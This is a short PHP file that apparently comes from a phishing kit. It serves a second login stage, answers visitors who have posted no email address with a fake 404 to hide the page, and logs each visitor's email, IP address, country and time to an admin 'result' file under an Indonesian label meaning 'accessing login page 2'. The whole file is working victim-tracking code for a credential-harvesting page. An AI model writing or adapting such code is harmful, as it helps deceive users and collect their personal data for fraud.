<?php
require_once('admin/config.php');
require_once('main.php');
$ip = getUserIP();
if (!isset($_POST['email'])) {
exit(header("HTTP/1.0 404 Not Found"));
}
require_once('files/login2.php');
if(isset($_POST['post'])){
    tulis_file("admin/result/total_click.txt", "".$cn."|".$_POST['email']."|".$ip."|Mengakses Halaman Login 2|".$date."");
}
?>